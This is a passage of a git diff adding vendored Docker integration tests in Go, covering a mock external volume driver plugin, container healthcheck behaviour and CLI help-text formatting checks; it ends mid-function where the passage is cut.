["VolumeDriver"]}`) + }) + + mux.HandleFunc("/VolumeDriver.Create", func(w http.ResponseWriter, r *http.Request) { + s.ec.creations++ + pr, err := read(r.Body) + if err != nil { + send(w, err) + return + } + _, isNinja := pr.Opts["ninja"] + status := map[string]interface{}{"Hello": "world"} + s.vols[pr.Name] = vol{Name: pr.Name, Ninja: isNinja, Status: status, Options: pr.Opts} + send(w, nil) + }) + + mux.HandleFunc("/VolumeDriver.List", func(w http.ResponseWriter, r *http.Request) { + s.ec.lists++ + vols := make([]vol, 0, len(s.vols)) + for _, v := range s.vols { + if v.Ninja { + continue + } + vols = append(vols, v) + } + send(w, map[string][]vol{"Volumes": vols}) + }) + + mux.HandleFunc("/VolumeDriver.Get", func(w http.ResponseWriter, r *http.Request) { + s.ec.gets++ + pr, err := read(r.Body) + if err != nil { + send(w, err) + return + } + + v, exists := s.vols[pr.Name] + if !exists { + send(w, `{"Err": "no such volume"}`) + } + + if v.Ninja { + send(w, map[string]vol{}) + return + } + + v.Mountpoint = hostVolumePath(pr.Name) + send(w, map[string]vol{"Volume": v}) + return + }) + + mux.HandleFunc("/VolumeDriver.Remove", func(w http.ResponseWriter, r *http.Request) { + s.ec.removals++ + pr, err := read(r.Body) + if err != nil { + send(w, err) + return + } + + v, ok := s.vols[pr.Name] + if !ok { + send(w, nil) + return + } + + if err := os.RemoveAll(hostVolumePath(v.Name)); err != nil { + send(w, &pluginResp{Err: err.Error()}) + return + } + delete(s.vols, v.Name) + send(w, nil) + }) + + mux.HandleFunc("/VolumeDriver.Path", func(w http.ResponseWriter, r *http.Request) { + s.ec.paths++ + + pr, err := read(r.Body) + if err != nil { + send(w, err) + return + } + p := hostVolumePath(pr.Name) + send(w, &pluginResp{Mountpoint: p}) + }) + + mux.HandleFunc("/VolumeDriver.Mount", func(w http.ResponseWriter, r *http.Request) { + s.ec.mounts++ + + pr, err := read(r.Body) + if err != nil { + send(w, err) + return + } + + if v, exists := s.vols[pr.Name]; exists { + // Use this 
to simulate a mount failure + if _, exists := v.Options["invalidOption"]; exists { + send(w, fmt.Errorf("invalid argument")) + return + } + } + + p := hostVolumePath(pr.Name) + if err := os.MkdirAll(p, 0755); err != nil { + send(w, &pluginResp{Err: err.Error()}) + return + } + + if err := ioutil.WriteFile(filepath.Join(p, "test"), []byte(s.Server.URL), 0644); err != nil { + send(w, err) + return + } + + if err := ioutil.WriteFile(filepath.Join(p, "mountID"), []byte(pr.ID), 0644); err != nil { + send(w, err) + return + } + + send(w, &pluginResp{Mountpoint: p}) + }) + + mux.HandleFunc("/VolumeDriver.Unmount", func(w http.ResponseWriter, r *http.Request) { + s.ec.unmounts++ + + _, err := read(r.Body) + if err != nil { + send(w, err) + return + } + + send(w, nil) + }) + + mux.HandleFunc("/VolumeDriver.Capabilities", func(w http.ResponseWriter, r *http.Request) { + s.ec.caps++ + + _, err := read(r.Body) + if err != nil { + send(w, err) + return + } + + send(w, `{"Capabilities": { "Scope": "global" }}`) + }) + + err := os.MkdirAll("/etc/docker/plugins", 0755) + c.Assert(err, checker.IsNil) + + err = ioutil.WriteFile("/etc/docker/plugins/"+name+".spec", []byte(s.Server.URL), 0644) + c.Assert(err, checker.IsNil) + return s +} + +func (s *DockerExternalVolumeSuite) TearDownSuite(c *check.C) { + s.volumePlugin.Close() + + err := os.RemoveAll("/etc/docker/plugins") + c.Assert(err, checker.IsNil) +} + +func (s *DockerExternalVolumeSuite) TestVolumeCLICreateOptionConflict(c *check.C) { + dockerCmd(c, "volume", "create", "test") + + out, _, err := dockerCmdWithError("volume", "create", "test", "--driver", volumePluginName) + c.Assert(err, check.NotNil, check.Commentf("volume create exception name already in use with another driver")) + c.Assert(out, checker.Contains, "A volume named test already exists") + + out, _ = dockerCmd(c, "volume", "inspect", "--format={{ .Driver }}", "test") + _, _, err = dockerCmdWithError("volume", "create", "test", "--driver", strings.TrimSpace(out)) 
+ c.Assert(err, check.IsNil) + + // make sure hidden --name option conflicts with positional arg name + out, _, err = dockerCmdWithError("volume", "create", "--name", "test2", "test2") + c.Assert(err, check.NotNil, check.Commentf("Conflicting options: either specify --name or provide positional arg, not both")) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverNamed(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("run", "--rm", "--name", "test-data", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, s.Server.URL) + + _, err = s.d.Cmd("volume", "rm", "external-volume-test") + c.Assert(err, checker.IsNil) + + p := hostVolumePath("external-volume-test") + _, err = os.Lstat(p) + c.Assert(err, checker.NotNil) + c.Assert(os.IsNotExist(err), checker.True, check.Commentf("Expected volume path in host to not exist: %s, %v\n", p, err)) + + c.Assert(s.ec.activations, checker.Equals, 1) + c.Assert(s.ec.creations, checker.Equals, 1) + c.Assert(s.ec.removals, checker.Equals, 1) + c.Assert(s.ec.mounts, checker.Equals, 1) + c.Assert(s.ec.unmounts, checker.Equals, 1) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnnamed(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("run", "--rm", "--name", "test-data", "-v", "/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(out, checker.Contains, s.Server.URL) + + c.Assert(s.ec.activations, checker.Equals, 1) + c.Assert(s.ec.creations, checker.Equals, 1) + c.Assert(s.ec.removals, checker.Equals, 1) + c.Assert(s.ec.mounts, checker.Equals, 1) + c.Assert(s.ec.unmounts, checker.Equals, 1) +} 
+ +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverVolumesFrom(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("run", "--name", "vol-test1", "-v", "/foo", "--volume-driver", volumePluginName, "busybox:latest") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("run", "--rm", "--volumes-from", "vol-test1", "--name", "vol-test2", "busybox", "ls", "/tmp") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("rm", "-fv", "vol-test1") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + c.Assert(s.ec.activations, checker.Equals, 1) + c.Assert(s.ec.creations, checker.Equals, 1) + c.Assert(s.ec.removals, checker.Equals, 1) + c.Assert(s.ec.mounts, checker.Equals, 2) + c.Assert(s.ec.unmounts, checker.Equals, 2) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverDeleteContainer(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("run", "--name", "vol-test1", "-v", "/foo", "--volume-driver", volumePluginName, "busybox:latest") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("rm", "-fv", "vol-test1") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + c.Assert(s.ec.activations, checker.Equals, 1) + c.Assert(s.ec.creations, checker.Equals, 1) + c.Assert(s.ec.removals, checker.Equals, 1) + c.Assert(s.ec.mounts, checker.Equals, 1) + c.Assert(s.ec.unmounts, checker.Equals, 1) +} + +func hostVolumePath(name string) string { + return fmt.Sprintf("/var/lib/docker/volumes/%s", name) +} + +// Make sure a request to use a down driver doesn't block other requests +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverLookupNotBlocked(c *check.C) { + specPath := "/etc/docker/plugins/down-driver.spec" + err := ioutil.WriteFile(specPath, []byte("tcp://127.0.0.7:9999"), 0644) + c.Assert(err, check.IsNil) + defer os.RemoveAll(specPath) + + chCmd1 := make(chan struct{}) + chCmd2 := 
make(chan error) + cmd1 := exec.Command(dockerBinary, "volume", "create", "-d", "down-driver") + cmd2 := exec.Command(dockerBinary, "volume", "create") + + c.Assert(cmd1.Start(), checker.IsNil) + defer cmd1.Process.Kill() + time.Sleep(100 * time.Millisecond) // ensure API has been called + c.Assert(cmd2.Start(), checker.IsNil) + + go func() { + cmd1.Wait() + close(chCmd1) + }() + go func() { + chCmd2 <- cmd2.Wait() + }() + + select { + case <-chCmd1: + cmd2.Process.Kill() + c.Fatalf("volume create with down driver finished unexpectedly") + case err := <-chCmd2: + c.Assert(err, checker.IsNil) + case <-time.After(5 * time.Second): + cmd2.Process.Kill() + c.Fatal("volume creates are blocked by previous create requests when previous driver is down") + } +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverRetryNotImmediatelyExists(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + specPath := "/etc/docker/plugins/test-external-volume-driver-retry.spec" + os.RemoveAll(specPath) + defer os.RemoveAll(specPath) + + errchan := make(chan error) + go func() { + if out, err := s.d.Cmd("run", "--rm", "--name", "test-data-retry", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", "test-external-volume-driver-retry", "busybox:latest"); err != nil { + errchan <- fmt.Errorf("%v:\n%s", err, out) + } + close(errchan) + }() + go func() { + // wait for a retry to occur, then create spec to allow plugin to register + time.Sleep(2000 * time.Millisecond) + // no need to check for an error here since it will get picked up by the timeout later + ioutil.WriteFile(specPath, []byte(s.Server.URL), 0644) + }() + + select { + case err := <-errchan: + c.Assert(err, checker.IsNil) + case <-time.After(8 * time.Second): + c.Fatal("volume creates fail when plugin not immediately available") + } + + _, err = s.d.Cmd("volume", "rm", "external-volume-test") + c.Assert(err, checker.IsNil) + + c.Assert(s.ec.activations, checker.Equals, 1) + 
c.Assert(s.ec.creations, checker.Equals, 1) + c.Assert(s.ec.removals, checker.Equals, 1) + c.Assert(s.ec.mounts, checker.Equals, 1) + c.Assert(s.ec.unmounts, checker.Equals, 1) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverBindExternalVolume(c *check.C) { + dockerCmd(c, "volume", "create", "-d", volumePluginName, "foo") + dockerCmd(c, "run", "-d", "--name", "testing", "-v", "foo:/bar", "busybox", "top") + + var mounts []struct { + Name string + Driver string + } + out := inspectFieldJSON(c, "testing", "Mounts") + c.Assert(json.NewDecoder(strings.NewReader(out)).Decode(&mounts), checker.IsNil) + c.Assert(len(mounts), checker.Equals, 1, check.Commentf(out)) + c.Assert(mounts[0].Name, checker.Equals, "foo") + c.Assert(mounts[0].Driver, checker.Equals, volumePluginName) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverList(c *check.C) { + dockerCmd(c, "volume", "create", "-d", volumePluginName, "abc3") + out, _ := dockerCmd(c, "volume", "ls") + ls := strings.Split(strings.TrimSpace(out), "\n") + c.Assert(len(ls), check.Equals, 2, check.Commentf("\n%s", out)) + + vol := strings.Fields(ls[len(ls)-1]) + c.Assert(len(vol), check.Equals, 2, check.Commentf("%v", vol)) + c.Assert(vol[0], check.Equals, volumePluginName) + c.Assert(vol[1], check.Equals, "abc3") + + c.Assert(s.ec.lists, check.Equals, 1) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverGet(c *check.C) { + out, _, err := dockerCmdWithError("volume", "inspect", "dummy") + c.Assert(err, check.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "No such volume") + c.Assert(s.ec.gets, check.Equals, 1) + + dockerCmd(c, "volume", "create", "test", "-d", volumePluginName) + out, _ = dockerCmd(c, "volume", "inspect", "test") + + type vol struct { + Status map[string]string + } + var st []vol + + c.Assert(json.Unmarshal([]byte(out), &st), checker.IsNil) + c.Assert(st, checker.HasLen, 1) + c.Assert(st[0].Status, checker.HasLen, 1, check.Commentf("%v", st[0])) 
+ c.Assert(st[0].Status["Hello"], checker.Equals, "world", check.Commentf("%v", st[0].Status)) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverWithDaemonRestart(c *check.C) { + dockerCmd(c, "volume", "create", "-d", volumePluginName, "abc1") + err := s.d.Restart() + c.Assert(err, checker.IsNil) + + dockerCmd(c, "run", "--name=test", "-v", "abc1:/foo", "busybox", "true") + var mounts []types.MountPoint + inspectFieldAndMarshall(c, "test", "Mounts", &mounts) + c.Assert(mounts, checker.HasLen, 1) + c.Assert(mounts[0].Driver, checker.Equals, volumePluginName) +} + +// Ensures that the daemon handles when the plugin responds to a `Get` request with a null volume and a null error. +// Prior the daemon would panic in this scenario. +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverGetEmptyResponse(c *check.C) { + c.Assert(s.d.Start(), checker.IsNil) + + out, err := s.d.Cmd("volume", "create", "-d", volumePluginName, "abc2", "--opt", "ninja=1") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("volume", "inspect", "abc2") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "No such volume") +} + +// Ensure only cached paths are used in volume list to prevent N+1 calls to `VolumeDriver.Path` +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverPathCalls(c *check.C) { + c.Assert(s.d.Start(), checker.IsNil) + c.Assert(s.ec.paths, checker.Equals, 0) + + out, err := s.d.Cmd("volume", "create", "test", "--driver=test-external-volume-driver") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(s.ec.paths, checker.Equals, 1) + + out, err = s.d.Cmd("volume", "ls") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(s.ec.paths, checker.Equals, 1) + + out, err = s.d.Cmd("volume", "inspect", "--format='{{.Mountpoint}}'", "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") + 
c.Assert(s.ec.paths, checker.Equals, 1) +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverMountID(c *check.C) { + err := s.d.StartWithBusybox() + c.Assert(err, checker.IsNil) + + out, err := s.d.Cmd("run", "--rm", "-v", "external-volume-test:/tmp/external-volume-test", "--volume-driver", volumePluginName, "busybox:latest", "cat", "/tmp/external-volume-test/test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(strings.TrimSpace(out), checker.Not(checker.Equals), "") +} + +// Check that VolumeDriver.Capabilities gets called, and only called once +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverCapabilities(c *check.C) { + c.Assert(s.d.Start(), checker.IsNil) + c.Assert(s.ec.caps, checker.Equals, 0) + + for i := 0; i < 3; i++ { + out, err := s.d.Cmd("volume", "create", "-d", volumePluginName, fmt.Sprintf("test%d", i)) + c.Assert(err, checker.IsNil, check.Commentf(out)) + c.Assert(s.ec.caps, checker.Equals, 1) + out, err = s.d.Cmd("volume", "inspect", "--format={{.Scope}}", fmt.Sprintf("test%d", i)) + c.Assert(err, checker.IsNil) + c.Assert(strings.TrimSpace(out), checker.Equals, volume.GlobalScope) + } +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverOutOfBandDelete(c *check.C) { + driverName := stringid.GenerateNonCryptoID() + p := newVolumePlugin(c, driverName) + defer p.Close() + + c.Assert(s.d.StartWithBusybox(), checker.IsNil) + + out, err := s.d.Cmd("volume", "create", "-d", driverName, "--name", "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("volume", "create", "-d", "local", "--name", "test") + c.Assert(err, checker.NotNil, check.Commentf(out)) + c.Assert(out, checker.Contains, "volume named test already exists") + + // simulate out of band volume deletion on plugin level + delete(p.vols, "test") + + // test re-create with same driver + out, err = s.d.Cmd("volume", "create", "-d", driverName, "--opt", "foo=bar", "--name", "test") + c.Assert(err, checker.IsNil, 
check.Commentf(out)) + out, err = s.d.Cmd("volume", "inspect", "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + var vs []types.Volume + err = json.Unmarshal([]byte(out), &vs) + c.Assert(err, checker.IsNil) + c.Assert(vs, checker.HasLen, 1) + c.Assert(vs[0].Driver, checker.Equals, driverName) + c.Assert(vs[0].Options, checker.NotNil) + c.Assert(vs[0].Options["foo"], checker.Equals, "bar") + c.Assert(vs[0].Driver, checker.Equals, driverName) + + // simulate out of band volume deletion on plugin level + delete(p.vols, "test") + + // test create with different driver + out, err = s.d.Cmd("volume", "create", "-d", "local", "--name", "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + + out, err = s.d.Cmd("volume", "inspect", "test") + c.Assert(err, checker.IsNil, check.Commentf(out)) + vs = nil + err = json.Unmarshal([]byte(out), &vs) + c.Assert(err, checker.IsNil) + c.Assert(vs, checker.HasLen, 1) + c.Assert(vs[0].Options, checker.HasLen, 0) + c.Assert(vs[0].Driver, checker.Equals, "local") +} + +func (s *DockerExternalVolumeSuite) TestExternalVolumeDriverUnmountOnMountFail(c *check.C) { + c.Assert(s.d.StartWithBusybox(), checker.IsNil) + s.d.Cmd("volume", "create", "-d", "test-external-volume-driver", "--opt=invalidOption=1", "--name=testumount") + + out, _ := s.d.Cmd("run", "-v", "testumount:/foo", "busybox", "true") + c.Assert(s.ec.unmounts, checker.Equals, 0, check.Commentf(out)) + out, _ = s.d.Cmd("run", "-w", "/foo", "-v", "testumount:/foo", "busybox", "true") + c.Assert(s.ec.unmounts, checker.Equals, 0, check.Commentf(out)) +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go new file mode 100644 index 0000000000..6b7baebd00 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_health_test.go @@ -0,0 +1,169 @@ +package main + +import ( + "encoding/json" + + "strconv" + "strings" + "time" + + 
"github.com/docker/docker/api/types" + "github.com/docker/docker/pkg/integration/checker" + "github.com/go-check/check" +) + +func waitForStatus(c *check.C, name string, prev string, expected string) { + prev = prev + "\n" + expected = expected + "\n" + for { + out, _ := dockerCmd(c, "inspect", "--format={{.State.Status}}", name) + if out == expected { + return + } + c.Check(out, checker.Equals, prev) + if out != prev { + return + } + time.Sleep(100 * time.Millisecond) + } +} + +func waitForHealthStatus(c *check.C, name string, prev string, expected string) { + prev = prev + "\n" + expected = expected + "\n" + for { + out, _ := dockerCmd(c, "inspect", "--format={{.State.Health.Status}}", name) + if out == expected { + return + } + c.Check(out, checker.Equals, prev) + if out != prev { + return + } + time.Sleep(100 * time.Millisecond) + } +} + +func getHealth(c *check.C, name string) *types.Health { + out, _ := dockerCmd(c, "inspect", "--format={{json .State.Health}}", name) + var health types.Health + err := json.Unmarshal([]byte(out), &health) + c.Check(err, checker.Equals, nil) + return &health +} + +func (s *DockerSuite) TestHealth(c *check.C) { + testRequires(c, DaemonIsLinux) // busybox doesn't work on Windows + + imageName := "testhealth" + _, err := buildImage(imageName, + `FROM busybox + RUN echo OK > /status + CMD ["/bin/sleep", "120"] + STOPSIGNAL SIGKILL + HEALTHCHECK --interval=1s --timeout=30s \ + CMD cat /status`, + true) + + c.Check(err, check.IsNil) + + // No health status before starting + name := "test_health" + dockerCmd(c, "create", "--name", name, imageName) + out, _ := dockerCmd(c, "ps", "-a", "--format={{.Status}}") + c.Check(out, checker.Equals, "Created\n") + + // Inspect the options + out, _ = dockerCmd(c, "inspect", + "--format=timeout={{.Config.Healthcheck.Timeout}} "+ + "interval={{.Config.Healthcheck.Interval}} "+ + "retries={{.Config.Healthcheck.Retries}} "+ + "test={{.Config.Healthcheck.Test}}", name) + c.Check(out, checker.Equals, 
"timeout=30s interval=1s retries=0 test=[CMD-SHELL cat /status]\n") + + // Start + dockerCmd(c, "start", name) + waitForHealthStatus(c, name, "starting", "healthy") + + // Make it fail + dockerCmd(c, "exec", name, "rm", "/status") + waitForHealthStatus(c, name, "healthy", "unhealthy") + + // Inspect the status + out, _ = dockerCmd(c, "inspect", "--format={{.State.Health.Status}}", name) + c.Check(out, checker.Equals, "unhealthy\n") + + // Make it healthy again + dockerCmd(c, "exec", name, "touch", "/status") + waitForHealthStatus(c, name, "unhealthy", "healthy") + + // Remove container + dockerCmd(c, "rm", "-f", name) + + // Disable the check from the CLI + out, _ = dockerCmd(c, "create", "--name=noh", "--no-healthcheck", imageName) + out, _ = dockerCmd(c, "inspect", "--format={{.Config.Healthcheck.Test}}", "noh") + c.Check(out, checker.Equals, "[NONE]\n") + dockerCmd(c, "rm", "noh") + + // Disable the check with a new build + _, err = buildImage("no_healthcheck", + `FROM testhealth + HEALTHCHECK NONE`, true) + c.Check(err, check.IsNil) + + out, _ = dockerCmd(c, "inspect", "--format={{.ContainerConfig.Healthcheck.Test}}", "no_healthcheck") + c.Check(out, checker.Equals, "[NONE]\n") + + // Enable the checks from the CLI + _, _ = dockerCmd(c, "run", "-d", "--name=fatal_healthcheck", + "--health-interval=0.5s", + "--health-retries=3", + "--health-cmd=cat /status", + "no_healthcheck") + waitForHealthStatus(c, "fatal_healthcheck", "starting", "healthy") + health := getHealth(c, "fatal_healthcheck") + c.Check(health.Status, checker.Equals, "healthy") + c.Check(health.FailingStreak, checker.Equals, 0) + last := health.Log[len(health.Log)-1] + c.Check(last.ExitCode, checker.Equals, 0) + c.Check(last.Output, checker.Equals, "OK\n") + + // Fail the check + dockerCmd(c, "exec", "fatal_healthcheck", "rm", "/status") + waitForHealthStatus(c, "fatal_healthcheck", "healthy", "unhealthy") + + failsStr, _ := dockerCmd(c, "inspect", "--format={{.State.Health.FailingStreak}}", 
"fatal_healthcheck") + fails, err := strconv.Atoi(strings.TrimSpace(failsStr)) + c.Check(err, check.IsNil) + c.Check(fails >= 3, checker.Equals, true) + dockerCmd(c, "rm", "-f", "fatal_healthcheck") + + // Check timeout + // Note: if the interval is too small, it seems that Docker spends all its time running health + // checks and never gets around to killing it. + _, _ = dockerCmd(c, "run", "-d", "--name=test", + "--health-interval=1s", "--health-cmd=sleep 5m", "--health-timeout=1ms", imageName) + waitForHealthStatus(c, "test", "starting", "unhealthy") + health = getHealth(c, "test") + last = health.Log[len(health.Log)-1] + c.Check(health.Status, checker.Equals, "unhealthy") + c.Check(last.ExitCode, checker.Equals, -1) + c.Check(last.Output, checker.Equals, "Health check exceeded timeout (1ms)") + dockerCmd(c, "rm", "-f", "test") + + // Check JSON-format + _, err = buildImage(imageName, + `FROM busybox + RUN echo OK > /status + CMD ["/bin/sleep", "120"] + STOPSIGNAL SIGKILL + HEALTHCHECK --interval=1s --timeout=30s \ + CMD ["cat", "/my status"]`, + true) + c.Check(err, check.IsNil) + out, _ = dockerCmd(c, "inspect", + "--format={{.Config.Healthcheck.Test}}", imageName) + c.Check(out, checker.Equals, "[CMD cat /my status]\n") + +} diff --git a/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go b/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go new file mode 100644 index 0000000000..29b6553fc5 --- /dev/null +++ b/vendor/github.com/docker/docker/integration-cli/docker_cli_help_test.go @@ -0,0 +1,321 @@ +package main + +import ( + "fmt" + "os/exec" + "runtime" + "strings" + "unicode" + + "github.com/docker/docker/pkg/homedir" + "github.com/docker/docker/pkg/integration/checker" + icmd "github.com/docker/docker/pkg/integration/cmd" + "github.com/go-check/check" +) + +func (s *DockerSuite) TestHelpTextVerify(c *check.C) { + testRequires(c, DaemonIsLinux) + + // Make sure main help text fits within 80 chars and that + // on 
non-windows system we use ~ when possible (to shorten things). + // Test for HOME set to its default value and set to "/" on linux + // Yes on windows setting up an array and looping (right now) isn't + // necessary because we just have one value, but we'll need the + // array/loop on linux so we might as well set it up so that we can + // test any number of home dirs later on and all we need to do is + // modify the array - the rest of the testing infrastructure should work + homes := []string{homedir.Get()} + + // Non-Windows machines need to test for this special case of $HOME + if runtime.GOOS != "windows" { + homes = append(homes, "/") + } + + homeKey := homedir.Key() + baseEnvs := appendBaseEnv(true) + + // Remove HOME env var from list so we can add a new value later. + for i, env := range baseEnvs { + if strings.HasPrefix(env, homeKey+"=") { + baseEnvs = append(baseEnvs[:i], baseEnvs[i+1:]...) + break + } + } + + for _, home := range homes { + + // Dup baseEnvs and add our new HOME value + newEnvs := make([]string, len(baseEnvs)+1) + copy(newEnvs, baseEnvs) + newEnvs[len(newEnvs)-1] = homeKey + "=" + home + + scanForHome := runtime.GOOS != "windows" && home != "/" + + // Check main help text to make sure its not over 80 chars + helpCmd := exec.Command(dockerBinary, "help") + helpCmd.Env = newEnvs + out, _, err := runCommandWithOutput(helpCmd) + c.Assert(err, checker.IsNil, check.Commentf(out)) + lines := strings.Split(out, "\n") + for _, line := range lines { + // All lines should not end with a space + c.Assert(line, checker.Not(checker.HasSuffix), " ", check.Commentf("Line should not end with a space")) + + if scanForHome && strings.Contains(line, `=`+home) { + c.Fatalf("Line should use '%q' instead of %q:\n%s", homedir.GetShortcutString(), home, line) + } + if runtime.GOOS != "windows" { + i := strings.Index(line, homedir.GetShortcutString()) + if i >= 0 && i != len(line)-1 && line[i+1] != '/' { + c.Fatalf("Main help should not have used home 
shortcut:\n%s", line) + } + } + } + + // Make sure each cmd's help text fits within 90 chars and that + // on non-windows system we use ~ when possible (to shorten things). + // Pull the list of commands from the "Commands:" section of docker help + helpCmd = exec.Command(dockerBinary, "help") + helpCmd.Env = newEnvs + out, _, err = runCommandWithOutput(helpCmd) + c.Assert(err, checker.IsNil, check.Commentf(out)) + i := strings.Index(out, "Commands:") + c.Assert(i, checker.GreaterOrEqualThan, 0, check.Commentf("Missing 'Commands:' in:\n%s", out)) + + cmds := []string{} + // Grab all chars starting at "Commands:" + helpOut := strings.Split(out[i:], "\n") + // Skip first line, it is just "Commands:" + helpOut = helpOut[1:] + + // Create the list of commands we want to test + cmdsToTest := []string{} + for _, cmd := range helpOut { + // Stop on blank line or non-idented line + if cmd == "" || !unicode.IsSpace(rune(cmd[0])) { + break + } + + // Grab just the first word of each line + cmd = strings.Split(strings.TrimSpace(cmd), " ")[0] + cmds = append(cmds, cmd) // Saving count for later + + cmdsToTest = append(cmdsToTest, cmd) + } + + // Add some 'two word' commands - would be nice to automatically + // calculate this list - somehow + cmdsToTest = append(cmdsToTest, "volume create") + cmdsToTest = append(cmdsToTest, "volume inspect") + cmdsToTest = append(cmdsToTest, "volume ls") + cmdsToTest = append(cmdsToTest, "volume rm") + cmdsToTest = append(cmdsToTest, "network connect") + cmdsToTest = append(cmdsToTest, "network create") + cmdsToTest = append(cmdsToTest, "network disconnect") + cmdsToTest = append(cmdsToTest, "network inspect") + cmdsToTest = append(cmdsToTest, "network ls") + cmdsToTest = append(cmdsToTest, "network rm") + + if experimentalDaemon { + cmdsToTest = append(cmdsToTest, "checkpoint create") + cmdsToTest = append(cmdsToTest, "checkpoint ls") + cmdsToTest = append(cmdsToTest, "checkpoint rm") + } + + // Divide the list of commands into go routines 
and run the func testcommand on the commands in parallel + // to save runtime of test + + errChan := make(chan error) + + for index := 0; index < len(cmdsToTest); index++ { + go func(index int) { + errChan <- testCommand(cmdsToTest[index], newEnvs, scanForHome, home) + }(index) + } + + for index := 0; index < len(cmdsToTest); index++ { + err := <-errChan + if err != nil { + c.Fatal(err) + } + } + } +} + +func (s *DockerSuite) TestHelpExitCodesHelpOutput(c *check.C) { + // Test to make sure the exit code and output (stdout vs stderr) of + // various good and bad cases are what we expect + + // docker : stdout=all, stderr=empty, rc=0 + out, _, err := dockerCmdWithError() + c.Assert(err, checker.IsNil, check.Commentf(out)) + // Be really pick + c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker'\n")) + + // docker help: stdout=all, stderr=empty, rc=0 + out, _, err = dockerCmdWithError("help") + c.Assert(err, checker.IsNil, check.Commentf(out)) + // Be really pick + c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker help'\n")) + + // docker --help: stdout=all, stderr=empty, rc=0 + out, _, err = dockerCmdWithError("--help") + c.Assert(err, checker.IsNil, check.Commentf(out)) + // Be really pick + c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker --help'\n")) + + // docker inspect busybox: stdout=all, stderr=empty, rc=0 + // Just making sure stderr is empty on valid cmd + out, _, err = dockerCmdWithError("inspect", "busybox") + c.Assert(err, checker.IsNil, check.Commentf(out)) + // Be really pick + c.Assert(out, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker inspect busyBox'\n")) + + // docker rm: stdout=empty, stderr=all, rc!=0 + // testing the min arg error msg + cmd := exec.Command(dockerBinary, "rm") 
+ stdout, stderr, _, err := runCommandWithStdoutStderr(cmd) + c.Assert(err, checker.NotNil) + c.Assert(stdout, checker.Equals, "") + // Should not contain full help text but should contain info about + // # of args and Usage line + c.Assert(stderr, checker.Contains, "requires at least 1 argument", check.Commentf("Missing # of args text from 'docker rm'\n")) + + // docker rm NoSuchContainer: stdout=empty, stderr=all, rc=0 + // testing to make sure no blank line on error + cmd = exec.Command(dockerBinary, "rm", "NoSuchContainer") + stdout, stderr, _, err = runCommandWithStdoutStderr(cmd) + c.Assert(err, checker.NotNil) + c.Assert(len(stderr), checker.Not(checker.Equals), 0) + c.Assert(stdout, checker.Equals, "") + // Be really picky + c.Assert(stderr, checker.Not(checker.HasSuffix), "\n\n", check.Commentf("Should not have a blank line at the end of 'docker rm'\n")) + + // docker BadCmd: stdout=empty, stderr=all, rc=0 + cmd = exec.Command(dockerBinary, "BadCmd") + stdout, stderr, _, err = runCommandWithStdoutStderr(cmd) + c.Assert(err, checker.NotNil) + c.Assert(stdout, checker.Equals, "") + c.Assert(stderr, checker.Equals, "docker: 'BadCmd' is not a docker command.\nSee 'docker --help'\n", check.Commentf("Unexcepted output for 'docker badCmd'\n")) +} + +func testCommand(cmd string, newEnvs []string, scanForHome bool, home string) error { + + args := 